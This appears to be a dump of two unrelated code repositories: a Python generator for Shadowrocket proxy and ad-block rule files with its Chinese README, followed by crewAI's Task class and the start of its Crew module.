File: factory/build_confs.py # -*- coding: utf-8 -*- import re import time # confs names in template/ and ../ # except sr_head and sr_foot confs_names = [ 'sr_top500_banlist_ad', 'sr_top500_banlist', 'sr_top500_whitelist_ad', 'sr_top500_whitelist', 'sr_adb', 'sr_direct_banad', 'sr_proxy_banad', 'sr_cnip', 'sr_cnip_ad', 'sr_backcn', 'sr_backcn_ad' ] def getRulesStringFromFile(path, kind): file = open(path, 'r', encoding='utf-8') contents = file.readlines() ret = '' for content in contents: content = content.strip('\r\n') if not len(content): continue if content.startswith('#'): ret += content + '\n' else: prefix = 'DOMAIN-SUFFIX' if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', content): prefix = 'IP-CIDR' if '/' not in content: content += '/32' elif '.' not in content: prefix = 'DOMAIN-KEYWORD' ret += prefix + ',%s,%s\n' % (content, kind) return ret # get head and foot str_head = open('template/sr_head.txt', 'r', encoding='utf-8').read() str_foot = open('template/sr_foot.txt', 'r', encoding='utf-8').read() # make values values = {} values['build_time'] = time.strftime("%Y-%m-%d %H:%M:%S") values['top500_proxy'] = getRulesStringFromFile('resultant/top500_proxy.list', 'Proxy') values['top500_direct'] = getRulesStringFromFile('resultant/top500_direct.list', 'Direct') values['ad'] = getRulesStringFromFile('resultant/ad.list', 'Reject') values['manual_direct'] = getRulesStringFromFile('manual_direct.txt', 'Direct') values['manual_proxy'] = getRulesStringFromFile('manual_proxy.txt', 'Proxy') values['manual_reject'] = getRulesStringFromFile('manual_reject.txt', 'Reject') values['gfwlist'] = getRulesStringFromFile('resultant/gfw.list', 'Proxy') \ + getRulesStringFromFile('manual_gfwlist.txt', 'Proxy') # make confs for conf_name in confs_names: file_template = open('template/'+conf_name+'.txt', 'r', encoding='utf-8') template = file_template.read() template = str_head + template + str_foot file_output = open('../'+conf_name+'.conf', 'w', encoding='utf-8') marks = re.findall(r'{{(.+)}}', template) for mark in marks: template = template.replace('{{'+mark+'}}', values[mark]) file_output.write(template) File: factory/top500.py # -*- coding: utf-8 -*- from bs4 import BeautifulSoup import threading import time import sys import requests urls = ['http://alexa.chinaz.com/Global/index.html'] for i in range(2,21): urls.append('http://alexa.chinaz.com/Global/index_%d.html'%i) urls_scan_over = False domains = [] domains_proxy = [] domains_direct = [] # thread to scan pages in urls class UrlScaner(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global urls_scan_over, urls done_num = 0 while len(urls): html = self.fetchHTML( urls.pop(0) ) self.praseHTML(html) done_num = done_num + 25 print('top500 List Got: %d/500'%done_num) time.sleep(1) urls_scan_over = True print('top500 List Fetched Over.') def fetchHTML(self, url): success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: sys.exit('error in request %s\n\treturn code: %d' % (url, r.status_code) ) r.encoding = 'utf-8' return r.text def praseHTML(self, html): soup = BeautifulSoup(html, "lxml") namesDom = soup.select("div.righttxt h3 span") for name in namesDom: domains.append(name.string) requests_header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 'Cache-Control': 'max-age=0', 
'Accept-Language': 'zh-CN,zh;q=0.8,zh-HK;q=0.6,zh-TW;q=0.4,en;q=0.2', 'Connection': 'keep-alive' } # thread to visit websites class DomainScaner(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): while not urls_scan_over or len(domains): if len(domains) == 0: time.sleep(2) continue domain = domains.pop(0) if domain.endswith('.cn'): continue if 'google' in domain: continue is_proxy = False try: requests.get('http://www.' + domain, timeout=10, headers=requests_header) except BaseException: try: requests.get('http://' + domain, timeout=10, headers=requests_header) except BaseException: is_proxy = True if is_proxy: domains_proxy.append(domain) else: domains_direct.append(domain) print('[Doamins Remain: %d]\tProxy %s:%s' % (len(domains), is_proxy, domain) ) global scaner_thread_num scaner_thread_num -= 1 print('top500 Script Starting...\n\n') # Start Thread UrlScaner().start() scaner_thread_num = 0 for i in range(3): DomainScaner().start() scaner_thread_num += 1 # wait thread done while scaner_thread_num: pass # write files file_proxy = open('resultant/top500_proxy.list', 'w', encoding='utf-8') file_direct = open('resultant/top500_direct.list', 'w', encoding='utf-8') now_time = time.strftime("%Y-%m-%d %H:%M:%S") file_proxy.write('# top500 proxy list update time: ' + now_time + '\n') file_direct.write('# top500 direct list update time: ' + now_time + '\n') domains_direct = list( set(domains_direct) ) domains_proxy = list( set(domains_proxy) ) domains_direct.sort() domains_proxy.sort() for domain in domains_direct: file_direct.write(domain+'\n') for domain in domains_proxy: file_proxy.write(domain+'\n') File: factory/gfwlist.py # -*- coding: utf-8 -*- # # 下载并解析最新版本的 GFWList # 对于混合性质的网站,尽量走代理(忽略了所有的@@指令) # import time import requests import re import base64 rules_url = 'https://raw.githubusercontent.com/gfwlist/gfwlist/master/gfwlist.txt' unhandle_rules = [] def get_rule(rules_url): success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(rules_url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: raise Exception('error in request %s\n\treturn code: %d' % (rules_url, r.status_code) ) rule = base64.b64decode(r.text) \ .decode("utf-8") \ .replace('\\n', '\n') return rule def clear_format(rule): rules = [] rule = rule.split('\n') for row in rule: row = row.strip() # 注释 直接跳过 if row == '' or row.startswith('!') or row.startswith('@@') or row.startswith('[AutoProxy'): continue # 清除前缀 row = re.sub(r'^\|?https?://', '', row) row = re.sub(r'^\|\|', '', row) row = row.lstrip('.*') # 清除后缀 row = row.rstrip('/^*') rules.append(row) return rules def filtrate_rules(rules): ret = [] for rule in rules: rule0 = rule # only hostname if '/' in rule: split_ret = rule.split('/') rule = split_ret[0] if not re.match('^[\w.-]+$', rule): unhandle_rules.append(rule0) continue ret.append(rule) ret = list( set(ret) ) ret.sort() return ret # main rule = get_rule(rules_url) rules = clear_format(rule) rules = filtrate_rules(rules) open('resultant/gfw.list', 'w', encoding='utf-8') \ .write('\n'.join(rules)) open('resultant/gfw_unhandle.log', 'w', encoding='utf-8') \ .write('\n'.join(unhandle_rules)) File: factory/chnroutes.py # -*- coding: utf-8 -*- # 爬取并生成 China Routes,目前此脚本未启用 import time import re import requests import sys apnic_ip_url = 'http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest' out_file = 'resultant/chnroutes.list' chnroutes = [] def fetchHTML(url): print("Downloading... 
" + url) success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: sys.exit('error in request %s\n\treturn code: %d' % (url, r.status_code) ) r.encoding = 'utf-8' return r.text.split('\n') # Main # apnic|CN|ipv4|116.89.240.0|1024|20170616|allocated searchRe = r'^apnic\|CN\|ipv4\|(.+)\|(\d+)\|\d+\|\w+$' for ln in fetchHTML(apnic_ip_url): reRet = re.match(searchRe, ln) if not reRet: continue print(reRet.group()) File: factory/ad.py # -*- coding: utf-8 -*- # # 提取广告规则,并且只提取对全域禁止的那种规则 # # 参考 ADB 广告规则格式:https://adblockplus.org/filters import time import sys import requests import re rules_url = [ # EasyList China #'https://easylist-downloads.adblockplus.org/easylistchina.txt', # EasyList + China 'https://easylist-downloads.adblockplus.org/easylistchina+easylist.txt', # 乘风 广告过滤规则 'https://raw.githubusercontent.com/xinggsf/Adblock-Plus-Rule/master/ABP-FX.txt' ] rule = '' # contain both domains and ips domains = [] for rule_url in rules_url: print('loading... ' + rule_url) # get rule text success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(rule_url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: sys.exit('error in request %s\n\treturn code: %d' % (rule_url, r.status_code) ) rule = rule + r.text + '\n' # parse rule rule = rule.split('\n') for row in rule: row = row.strip() row0 = row # 处理广告例外规则 if row.startswith('@@'): i = 0 while i < len(domains): domain = domains[i] if domain in row: del domains[i] else: i = i + 1 continue # 处理广告黑名单规则 # 直接跳过 if row=='' or row.startswith('!') or "$" in row or "##" in row: continue # 清除前缀 row = re.sub(r'^\|?https?://', '', row) row = re.sub(r'^\|\|', '', row) row = row.lstrip('.*') # 清除后缀 row = row.rstrip('/^*') row = re.sub(r':\d{2,5}$', '', row) # 清除端口 # 不能含有的字符 if re.search(r'[/^:*]', row): print('ignore: '+row0) continue # 只匹配域名或 IP if re.match(r'^([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,9}$', row) or re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', row): domains.append(row) print('done.') # write into files file_ad = sys.stdout try: if sys.version_info.major == 3: file_ad = open('resultant/ad.list', 'w', encoding='utf-8') else: file_ad = open('resultant/ad.list', 'w') except: pass file_ad.write('# adblock rules refresh time: ' + time.strftime("%Y-%m-%d %H:%M:%S") + '\n') domains = list( set(domains) ) domains.sort() for item in domains: file_ad.write(item + '\n')
## 最完善的 iOS 翻墙规则 ### 停止更新公告 维护该项目已花费了我过多的时间,而生活中值得花费时间的东西太多,所以从即日起停止更新该项目。 ------------------------------------------------------ 这里是一系列好用的翻墙规则,针对 [Shadowrocket](https://liguangming.com/Shadowrocket) 开发,支持广告过滤。规则定义了哪些网站可以直连,哪些必须走代理,规则是一个纯文本文件,无法提供翻墙功能。使用 Python 按照一定的规则和模板定期自动生成,并且使用开源的力量,集众人之力逐渐完善。 **正在使用手机浏览本页面的用户 [请点击这里](https://github.com/h2y/Shadowrocket-ADBlock-Rules/blob/master/readme.md),查看完整的说明文档。** **本规则具有以下特点:** - 黑名单由最新版 GFWList 自动转换;白名单针对全球 top500 站点的连通情况定期自动生成。 - 自动转换最新版本的 `EasyList, Eaylist China, 乘风规则` 为 SR 规则,全面去除广告且去除重复。 - 也包括自定义的广告过滤规则,针对 iOS 端的网页广告、App 广告和视频广告。([常见广告过滤效果统计](https://github.com/h2y/Shadowrocket-ADBlock-Rules/issues/40)) - 提供多个规则文件让大家自由选择或者自由切换使用。 - 专门针对 ShadowRocket 开发,可以保证与 SR 的兼容性。 ## 规则列表 ![规则选择指南](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/guide.png) 规则 | 规定代理的网站 | 规定直连的网站 --- | ----------- | ------------- [黑名单规则 + 去广告](#黑名单过滤--广告) | 被墙的网站(GFWList) | 正常的网站 [黑名单规则](#黑名单过滤) | | [白名单规则 + 去广告](#白名单过滤--广告) | 其他网站 | top500 网站中可直连的网站、中国网站 [白名单规则](#白名单过滤) | | [国内外划分 + 去广告](#国内外划分--广告) | 国外网站 | 中国网站 [国内外划分](#国内外划分) | | [全局直连 + 去广告](#直连去广告) | / | 全部 [全局代理 + 去广告](#代理去广告) | 全部 | / [回国规则 + 去广告](#回国规则--广告) | 中国网站 | 国外网站 [回国规则](#回国规则) | | - 以上所有规则,局域网内请求均直连。 - 可以下载多个规则切换使用。 ## 规则使用方法 在 ShadowRocket 应用中,进入 [配置] 页面,点击扫描二维码的按钮添加规则。再激活添加的规则文件即可。 最好让 ShadowRocket 断开并重新连接一次,以确保新的规则文件生效。 ## 请保护好自己 谷歌中英文的搜索体验都优于百度,而刷美剧、ins 追星、去推特看看特朗普也都挺有意思。但是,随着看到的人和事越多,我越发想要在这里说一些话,告诫路过的各位: **请务必保护好自己** 我们自认为打破了信息的壁垒,其实打破的是保护我们的屏障。因为外网真的存在很多误导性言论,来自各个利益集团对中国网民疯狂洗脑,他们往往还喜欢以平等自由等旗号自称,但仔细想想真的是这样吗?我只知道美国是最善于运用舆论的国家,会结合大数据潜移默化地改变你的观念。如果大家在上网过程中不经意看到了某些观点,务必保留自己独立思考的能力,如果你是一个容易被带偏的人,则建议回到屏障之中。 本规则只提供给大家用于更便捷地学习和工作。如果你是对上述观点持反对意见的极端政治人士,或者已被洗脑,请立即离开,本项目不对你开放。 ## 一些推荐的网站 [**糖客翻墙网**](https://cutt.ly/hhw1ZTi) :lollipop: 我最终选择的节点提供商。稳定、价格适中。节点遍布全球,提供 iPLC 路线。欢迎大家通过我的邀请链接前去使用。 iPLC 隧道不经过拥堵的公网出国、不经过防火墙,是目前最优秀的路线,速度谁用谁知道,建议选择。 **[IP111](http://ip111.cn/)** 这是一个很棒的 IP 查询网站,支持同时查询你的境内境外 IP,以及谷歌 IP。 **[wikiHow](https://zh.wikihow.com/)** 如何帮助心碎的朋友?如何给吊扇加油?你想知道的一切都可以在这里找到答案,最关键是采用漫画的方式挺有意思。 **[Google Photos](https://www.google.com/photos/about/)** 谷歌云相册提供无限空间保存手机中的日常照片,并且会对照片智能分类,体验很好。 **<https://hzy.pw/>** 我是一名大学生,沉迷技术无法自拔。这是我的个人博客,会分享一些有趣的东西和自己的观点,欢迎来逛逛~ ## 常见问题 - **上千行的代理规则,会对上网速度产生影响吗?** > 不会的。 > > 我之前也认为这是一个每次网络数据包经过都会执行一次的规则文件,逐行匹配规则,所以需要尽可能精简。但后来和 SR 作者交流后发现这是一个误区,SR 在每次加载规则时都会生成一棵搜索树,可以理解为对主机名从后往前的有限状态机 DFA,并不是逐行匹配,并且对每次的匹配结果还有个哈希缓存。 > > 换句话说,2000 行的规则和 50 行的规则在 SR 中均为同一量级的时间复杂度 O(1)。 - **你提供了这么多规则,如何选择适合我的?** > 最常用的规则是黑名单和白名单。区别在于对待 `未知网站` 的不同处理方式,黑名单默认直连,而白名单则默认使用代理。如果你选择恐惧症爆发,那就两个都下载好了,黑白名单切换使用,天下无忧。 - **你提供了这么多规则,却没有我想要的 o(>.<)o** > 有任何建议或疑问,[请联系我](#问题反馈)。 - **广告过滤不完全?** > 该规则并不保证 100% 过滤所有的广告,尤其是视频广告,与网页广告不同的是,优酷等 App 每次升级都有可能更换一次广告策略,因此难以保证其广告屏蔽的实时有效性。 ## 问题反馈 任何问题欢迎在 [Issues](https://github.com/h2y/Shadowrocket-ADBlock-Rules/issues) 中反馈,如果没有账号可以去 [我的网站](https://hzy.pw/p/2096#comments) 中留言。 你的反馈会让此规则变得更加完美。 **如何贡献代码?** 通常的情况下,对 [factory 目录](https://github.com/h2y/Shadowrocket-ADBlock-Rules/tree/master/factory) 下的 3 个 `manual_*.txt` 文件做对应修改即可。 ## 捐助 本项目不接受任何形式的捐助,因为自由地上网本来就是大家的权利,没有必要为此付出更多的代价。 但是,作为一个翻墙规则,不可避免的会对网站有所遗漏,需要大家来共同完善,当发现不好用的地方时,请打开 SR 的日志功能,检查一下是哪一个被墙的域名走了直连,或者是哪一个可以直连的域名走了代理。 将需要修改的信息反馈给我,大家的努力会让这个规则越来越完善! 
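The FAQ above explains that Shadowrocket does not match a request against the rule file line by line: when a configuration is loaded it builds a search tree over hostnames read from the last label backwards (plus a hash cache of match results), so a 2,000-line list and a 50-line list cost roughly the same per lookup. A minimal sketch of that idea, purely for illustration (this is not Shadowrocket's actual code):

```python
class SuffixTrie:
    """Toy DOMAIN-SUFFIX matcher: rules are inserted label by label starting
    from the rightmost label, so lookup cost depends on the depth of the
    hostname, not on the number of rules."""

    def __init__(self):
        self.root = {}

    def add(self, domain, policy):
        node = self.root
        for label in reversed(domain.lower().split('.')):
            node = node.setdefault(label, {})
        node['#policy'] = policy

    def match(self, hostname):
        node, hit = self.root, None
        for label in reversed(hostname.lower().split('.')):
            if label not in node:
                break
            node = node[label]
            hit = node.get('#policy', hit)
        return hit


rules = SuffixTrie()
rules.add('google.com', 'PROXY')
rules.add('baidu.com', 'DIRECT')
print(rules.match('www.google.com'))   # PROXY
print(rules.match('tieba.baidu.com'))  # DIRECT
print(rules.match('example.org'))      # None -> fall through to the default policy
```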
---------------------------------------- ## 黑名单过滤 + 广告 黑名单中包含了境外网站中无法访问的那些,对不确定的网站则默认直连。 - 代理:被墙的网站(GFWList) - 直连:正常的网站 - 包含广告过滤 规则地址:<https://git.io/JfIXs> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_banlist_ad.png?1) ## 白名单过滤 + 广告 白名单中包含了境外网站中可以访问的那些,对不确定的网站则默认代理。 - 直连:top500 网站中可直连的境外网站、中国网站 - 代理:默认代理其余的所有境外网站 - 包含广告过滤 规则地址:<https://git.io/JfIXo> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_whitelist_ad.png?1) ## 黑名单过滤 现在很多浏览器都自带了广告过滤功能,而广告过滤的规则其实较为臃肿,如果你不需要全局地过滤 App 内置广告和视频广告,可以选择这个不带广告过滤的版本。 - 代理:被墙的网站(GFWList) - 直连:正常的网站 - 不包含广告过滤 规则地址:<https://git.io/JfIXS> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_banlist.png?1) ## 白名单过滤 现在很多浏览器都自带了广告过滤功能,而广告过滤的规则其实较为臃肿,如果你不需要全局地过滤 App 内置广告和视频广告,可以选择这个不带广告过滤的版本。 - 直连:top500 网站中可直连的境外网站、中国网站 - 代理:默认代理其余的所有境外网站 - 不包含广告过滤 规则地址:<https://git.io/JfIXh> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_whitelist.png?1) ## 国内外划分 + 广告 国内外划分,对中国网站直连,外国网站代理。包含广告过滤。国外网站总是走代理,对于某些港澳台网站,速度反而会比直连更快。 规则地址:<https://git.io/JfI1k> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_cnip_ad.png?1) ## 国内外划分 国内外划分,对中国网站直连,外国网站代理。不包含广告过滤。国外网站总是走代理,对于某些港澳台网站,速度反而会比直连更快。 规则地址:<https://git.io/JfI1q> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_cnip.png?1) ## 直连去广告 如果你想将 SR 作为 iOS 全局去广告工具,这个规则会对你有所帮助。 - 直连:所有请求 - 包含广告过滤 规则地址:<https://git.io/JfI1m> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_direct_banad.png?1) ## 代理去广告 如果你想将 SR 作为 iOS 全局去广告 + 全局翻墙工具,这个规则会对你有所帮助。 - 直连:局域网请求 - 代理:其余所有请求 - 包含广告过滤 规则地址:<https://git.io/JfI13> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_proxy_banad.png?1) ## 回国规则 提供给海外华侨使用,可以回到墙内,享受国内的一些互联网服务。 - 直连:国外网站 - 代理:中国网站 - 不包含广告过滤 规则地址:<https://git.io/JfI1s> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_backcn.png?1) ## 回国规则 + 广告 提供给海外华侨使用,可以回到墙内,享受国内的一些互联网服务。 - 直连:国外网站 - 代理:中国网站 - 包含广告过滤 规则地址:<https://git.io/JfI1Z> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_backcn_ad.png?1)
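All of the rule files above are produced by `factory/build_confs.py`, which maps every non-comment entry in the source lists to one Shadowrocket rule line. The core of that mapping, restated as a tiny standalone function (a simplified sketch for illustration only; the real `getRulesStringFromFile` also carries comment lines through and wraps the result in the head/foot templates):

```python
import re

def to_rule(entry, policy):
    """Mirror the prefix logic of getRulesStringFromFile: bare IPv4 addresses
    become IP-CIDR rules, entries without a dot become DOMAIN-KEYWORD rules,
    and everything else is treated as a domain suffix."""
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', entry):
        if '/' not in entry:
            entry += '/32'
        return 'IP-CIDR,%s,%s' % (entry, policy)
    if '.' not in entry:
        return 'DOMAIN-KEYWORD,%s,%s' % (entry, policy)
    return 'DOMAIN-SUFFIX,%s,%s' % (entry, policy)

print(to_rule('google.com', 'Proxy'))     # DOMAIN-SUFFIX,google.com,Proxy
print(to_rule('blogspot', 'Proxy'))       # DOMAIN-KEYWORD,blogspot,Proxy
print(to_rule('8.8.8.8', 'Direct'))       # IP-CIDR,8.8.8.8/32,Direct
print(to_rule('91.108.4.0/22', 'Proxy'))  # IP-CIDR,91.108.4.0/22,Proxy
```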
crewAI
322780a5f36840bf566aac97d872dc64261f4474
File: src/crewai/task.py import datetime import json import os import threading import uuid from concurrent.futures import Future from copy import copy from hashlib import md5 from typing import Any, Dict, List, Optional, Set, Tuple, Type, Union from opentelemetry.trace import Span from pydantic import ( UUID4, BaseModel, Field, PrivateAttr, field_validator, model_validator, ) from pydantic_core import PydanticCustomError from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.tasks.output_format import OutputFormat from crewai.tasks.task_output import TaskOutput from crewai.telemetry.telemetry import Telemetry from crewai.utilities.config import process_config from crewai.utilities.converter import Converter, convert_to_model from crewai.utilities.i18n import I18N class Task(BaseModel): """Class that represents a task to be executed. Each task must have a description, an expected output and an agent responsible for execution. Attributes: agent: Agent responsible for task execution. Represents entity performing task. async_execution: Boolean flag indicating asynchronous task execution. callback: Function/object executed post task completion for additional actions. config: Dictionary containing task-specific configuration parameters. context: List of Task instances providing task context or input data. description: Descriptive text detailing task's purpose and execution. expected_output: Clear definition of expected task outcome. output_file: File path for storing task output. output_json: Pydantic model for structuring JSON output. output_pydantic: Pydantic model for task output. tools: List of tools/resources limited for task execution. """ __hash__ = object.__hash__ # type: ignore used_tools: int = 0 tools_errors: int = 0 delegations: int = 0 i18n: I18N = I18N() name: Optional[str] = Field(default=None) prompt_context: Optional[str] = None description: str = Field(description="Description of the actual task.") expected_output: str = Field( description="Clear definition of expected output for the task." 
) config: Optional[Dict[str, Any]] = Field( description="Configuration for the agent", default=None, ) callback: Optional[Any] = Field( description="Callback to be executed after the task is completed.", default=None ) agent: Optional[BaseAgent] = Field( description="Agent responsible for execution the task.", default=None ) context: Optional[List["Task"]] = Field( description="Other tasks that will have their output used as context for this task.", default=None, ) async_execution: Optional[bool] = Field( description="Whether the task should be executed asynchronously or not.", default=False, ) output_json: Optional[Type[BaseModel]] = Field( description="A Pydantic model to be used to create a JSON output.", default=None, ) output_pydantic: Optional[Type[BaseModel]] = Field( description="A Pydantic model to be used to create a Pydantic output.", default=None, ) output_file: Optional[str] = Field( description="A file path to be used to create a file output.", default=None, ) output: Optional[TaskOutput] = Field( description="Task output, it's final result after being executed", default=None ) tools: Optional[List[Any]] = Field( default_factory=list, description="Tools the agent is limited to use for this task.", ) id: UUID4 = Field( default_factory=uuid.uuid4, frozen=True, description="Unique identifier for the object, not set by user.", ) human_input: Optional[bool] = Field( description="Whether the task should have a human review the final answer of the agent", default=False, ) converter_cls: Optional[Type[Converter]] = Field( description="A converter class used to export structured output", default=None, ) processed_by_agents: Set[str] = Field(default_factory=set) _telemetry: Telemetry = PrivateAttr(default_factory=Telemetry) _execution_span: Optional[Span] = PrivateAttr(default=None) _original_description: Optional[str] = PrivateAttr(default=None) _original_expected_output: Optional[str] = PrivateAttr(default=None) _thread: Optional[threading.Thread] = PrivateAttr(default=None) _execution_time: Optional[float] = PrivateAttr(default=None) @model_validator(mode="before") @classmethod def process_model_config(cls, values): return process_config(values, cls) @model_validator(mode="after") def validate_required_fields(self): required_fields = ["description", "expected_output"] for field in required_fields: if getattr(self, field) is None: raise ValueError( f"{field} must be provided either directly or through config" ) return self @field_validator("id", mode="before") @classmethod def _deny_user_set_id(cls, v: Optional[UUID4]) -> None: if v: raise PydanticCustomError( "may_not_set_field", "This field is not to be set by the user.", {} ) def _set_start_execution_time(self) -> float: return datetime.datetime.now().timestamp() def _set_end_execution_time(self, start_time: float) -> None: self._execution_time = datetime.datetime.now().timestamp() - start_time @field_validator("output_file") @classmethod def output_file_validation(cls, value: str) -> str: """Validate the output file path by removing the / from the beginning of the path.""" if value.startswith("/"): return value[1:] return value @model_validator(mode="after") def set_attributes_based_on_config(self) -> "Task": """Set attributes based on the agent configuration.""" if self.config: for key, value in self.config.items(): setattr(self, key, value) return self @model_validator(mode="after") def check_tools(self): """Check if the tools are set.""" if not self.tools and self.agent and self.agent.tools: self.tools.extend(self.agent.tools) 
return self @model_validator(mode="after") def check_output(self): """Check if an output type is set.""" output_types = [self.output_json, self.output_pydantic] if len([type for type in output_types if type]) > 1: raise PydanticCustomError( "output_type", "Only one output type can be set, either output_pydantic or output_json.", {}, ) return self def execute_sync( self, agent: Optional[BaseAgent] = None, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> TaskOutput: """Execute the task synchronously.""" return self._execute_core(agent, context, tools) @property def key(self) -> str: description = self._original_description or self.description expected_output = self._original_expected_output or self.expected_output source = [description, expected_output] return md5("|".join(source).encode(), usedforsecurity=False).hexdigest() def execute_async( self, agent: BaseAgent | None = None, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> Future[TaskOutput]: """Execute the task asynchronously.""" future: Future[TaskOutput] = Future() threading.Thread( target=self._execute_task_async, args=(agent, context, tools, future) ).start() return future def _execute_task_async( self, agent: Optional[BaseAgent], context: Optional[str], tools: Optional[List[Any]], future: Future[TaskOutput], ) -> None: """Execute the task asynchronously with context handling.""" result = self._execute_core(agent, context, tools) future.set_result(result) def _execute_core( self, agent: Optional[BaseAgent], context: Optional[str], tools: Optional[List[Any]], ) -> TaskOutput: """Run the core execution logic of the task.""" agent = agent or self.agent self.agent = agent if not agent: raise Exception( f"The task '{self.description}' has no agent assigned, therefore it can't be executed directly and should be executed in a Crew using a specific process that support that, like hierarchical." ) start_time = self._set_start_execution_time() self._execution_span = self._telemetry.task_started(crew=agent.crew, task=self) self.prompt_context = context tools = tools or self.tools or [] self.processed_by_agents.add(agent.role) result = agent.execute_task( task=self, context=context, tools=tools, ) pydantic_output, json_output = self._export_output(result) task_output = TaskOutput( name=self.name, description=self.description, expected_output=self.expected_output, raw=result, pydantic=pydantic_output, json_dict=json_output, agent=agent.role, output_format=self._get_output_format(), ) self.output = task_output self._set_end_execution_time(start_time) if self.callback: self.callback(self.output) if self._execution_span: self._telemetry.task_ended(self._execution_span, self, agent.crew) self._execution_span = None if self.output_file: content = ( json_output if json_output else pydantic_output.model_dump_json() if pydantic_output else result ) self._save_file(content) return task_output def prompt(self) -> str: """Prompt the task. Returns: Prompt of the task. 
""" tasks_slices = [self.description] output = self.i18n.slice("expected_output").format( expected_output=self.expected_output ) tasks_slices = [self.description, output] return "\n".join(tasks_slices) def interpolate_inputs(self, inputs: Dict[str, Any]) -> None: """Interpolate inputs into the task description and expected output.""" if self._original_description is None: self._original_description = self.description if self._original_expected_output is None: self._original_expected_output = self.expected_output if inputs: self.description = self._original_description.format(**inputs) self.expected_output = self._original_expected_output.format(**inputs) def increment_tools_errors(self) -> None: """Increment the tools errors counter.""" self.tools_errors += 1 def increment_delegations(self, agent_name: Optional[str]) -> None: """Increment the delegations counter.""" if agent_name: self.processed_by_agents.add(agent_name) self.delegations += 1 def copy(self, agents: List["BaseAgent"]) -> "Task": """Create a deep copy of the Task.""" exclude = { "id", "agent", "context", "tools", } copied_data = self.model_dump(exclude=exclude) copied_data = {k: v for k, v in copied_data.items() if v is not None} cloned_context = ( [task.copy(agents) for task in self.context] if self.context else None ) def get_agent_by_role(role: str) -> Union["BaseAgent", None]: return next((agent for agent in agents if agent.role == role), None) cloned_agent = get_agent_by_role(self.agent.role) if self.agent else None cloned_tools = copy(self.tools) if self.tools else [] copied_task = Task( **copied_data, context=cloned_context, agent=cloned_agent, tools=cloned_tools, ) return copied_task def _export_output( self, result: str ) -> Tuple[Optional[BaseModel], Optional[Dict[str, Any]]]: pydantic_output: Optional[BaseModel] = None json_output: Optional[Dict[str, Any]] = None if self.output_pydantic or self.output_json: model_output = convert_to_model( result, self.output_pydantic, self.output_json, self.agent, self.converter_cls, ) if isinstance(model_output, BaseModel): pydantic_output = model_output elif isinstance(model_output, dict): json_output = model_output elif isinstance(model_output, str): try: json_output = json.loads(model_output) except json.JSONDecodeError: json_output = None return pydantic_output, json_output def _get_output_format(self) -> OutputFormat: if self.output_json: return OutputFormat.JSON if self.output_pydantic: return OutputFormat.PYDANTIC return OutputFormat.RAW def _save_file(self, result: Any) -> None: if self.output_file is None: raise ValueError("output_file is not set.") directory = os.path.dirname(self.output_file) # type: ignore # Value of type variable "AnyOrLiteralStr" of "dirname" cannot be "str | None" if directory and not os.path.exists(directory): os.makedirs(directory) with open(self.output_file, "w", encoding="utf-8") as file: if isinstance(result, dict): import json json.dump(result, file, ensure_ascii=False, indent=2) else: file.write(str(result)) return None def __repr__(self): return f"Task(description={self.description}, expected_output={self.expected_output})" File: src/crewai/__init__.py from crewai.agent import Agent from crewai.crew import Crew from crewai.pipeline import Pipeline from crewai.process import Process from crewai.routers import Router from crewai.task import Task __all__ = ["Agent", "Crew", "Process", "Task", "Pipeline", "Router"] File: src/crewai/crew.py import asyncio import json import os import uuid from concurrent.futures import Future from hashlib 
import md5 from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union from langchain_core.callbacks import BaseCallbackHandler from pydantic import ( UUID4, BaseModel, Field, InstanceOf, Json, PrivateAttr, field_validator, model_validator, ) from pydantic_core import PydanticCustomError from crewai.agent import Agent from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.agents.cache import CacheHandler from crewai.crews.crew_output import CrewOutput from crewai.memory.entity.entity_memory import EntityMemory from crewai.memory.long_term.long_term_memory import LongTermMemory from crewai.memory.short_term.short_term_memory import ShortTermMemory from crewai.process import Process from crewai.task import Task from crewai.tasks.conditional_task import ConditionalTask from crewai.tasks.task_output import TaskOutput from crewai.telemetry import Telemetry from crewai.tools.agent_tools import AgentTools from crewai.types.usage_metrics import UsageMetrics from crewai.utilities import I18N, FileHandler, Logger, RPMController from crewai.utilities.constants import ( TRAINING_DATA_FILE, ) from crewai.utilities.evaluators.crew_evaluator_handler import CrewEvaluator from crewai.utilities.evaluators.task_evaluator import TaskEvaluator from crewai.utilities.formatter import ( 